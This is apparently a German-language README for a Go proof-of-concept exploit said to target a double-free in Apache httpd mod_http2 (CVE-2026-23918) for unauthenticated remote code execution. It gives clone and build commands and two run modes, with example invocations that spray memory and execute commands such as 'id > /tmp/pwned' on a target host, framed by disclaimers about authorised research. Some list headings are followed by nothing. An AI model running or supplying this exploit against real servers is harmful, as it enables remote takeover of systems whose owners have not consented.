
Go-basierter Proof-of-Concept-Exploit für CVE-2026-23918, der eine Double-Free-Sicherheitslücke in Apache httpd mod_http2 ausnutzt, was eine Remote-Codeausführung ohne Authentifizierung mittels Memory-Spray- und Trigger-Sequenzen ermöglicht.
Dieses Repository enthält eine Proof-of-Concept-Implementierung in Go für ein Pre-Authentication-Memory-Corruption-Szenario, das Apache httpd mit mod_http2 betrifft. Der Code in diesem Repository zeigt einen Spray-and-Trigger-Ansatz gegen ein anfälliges Ziel und ist für autorisierte Sicherheitsforschung, Tests und defensive Analyse bestimmt.
Das Projekt konzentriert sich auf einen Proof-of-Concept-Exploit für CVE-2026-23918 und bietet eine Single-File-Implementierung in exploit_poc.go. Das Programm:
Dieses Repository ist nicht für die unbefugte Nutzung gegen Drittsysteme bestimmt.
Stellen Sie vor dem Bauen oder Ausführen des PoC sicher, dass Folgendes verfügbar ist:
Erstellen Sie das Binary mit dem folgenden Befehl:
git clone https://github.com/gagaltotal/CVE-2026-23918-Double-free-Apache-httpd-mod_http2
cd CVE-2026-23918-Double-free-Apache-httpd-mod_http2
go mod init CVE-2026-23918-Double-free-Apache-httpd-mod_http2
go mod tidy
go run exploit_poc.go
go build -o exploit exploit_poc.go
Dies erzeugt eine ausführbare Datei namens exploit im Projektstammverzeichnis.


Der PoC unterstützt zwei Betriebsmodi:
Dieser Modus erfordert Root-Zugriff und extrahiert automatisch die erforderlichen Speicheradressen aus dem Ziel-Apache-Worker-Prozess.
sudo ./exploit \
--pid 1234 \
--host 192.168.1.100 \
--port 443 \
--cmd "id > /tmp/pwned"
Dieser Modus erfordert, dass die Adressen der system-Funktion und des Scoreboard-Request-Slots manuell angegeben werden.
./exploit \
--host 192.168.1.100 \
--port 443 \
--system 0x7f1234567890 \
--scoreboard 0x7f1234000000 \
--cmd "id > /tmp/pwned"
Die wichtigsten Optionen sind:
--host - Zielhostname oder IP-Adresse--port - Zielport (Standard: 443)--workers - Anzahl der Spray-Worker-Threads (Standard: 32)--cmd - Auf dem Ziel auszuführender Befehl--pid - Apache-Worker-Prozess-ID für automatische Speicheradress-Extraktion--system - Adresse des system-Symbols im manuellen Modus--scoreboard - Adresse des Scoreboard-Request-Slots im manuellen Modussudo ./exploit --pid 1234 --host 10.0.0.20 --cmd "whoami"
./exploit \
--host 10.0.0.20 \
--system 0x7f1234567890 \
--scoreboard 0x7f1234000000 \
--cmd "uname -a"
Dieses Repository wird zu Bildungszwecken und zur defensiven Sicherheitsbewertung bereitgestellt. Eine Nutzung außerhalb einer kontrollierten und autorisierten Umgebung wird nicht empfohlen und kann gegen geltende Gesetze oder Richtlinien verstoßen.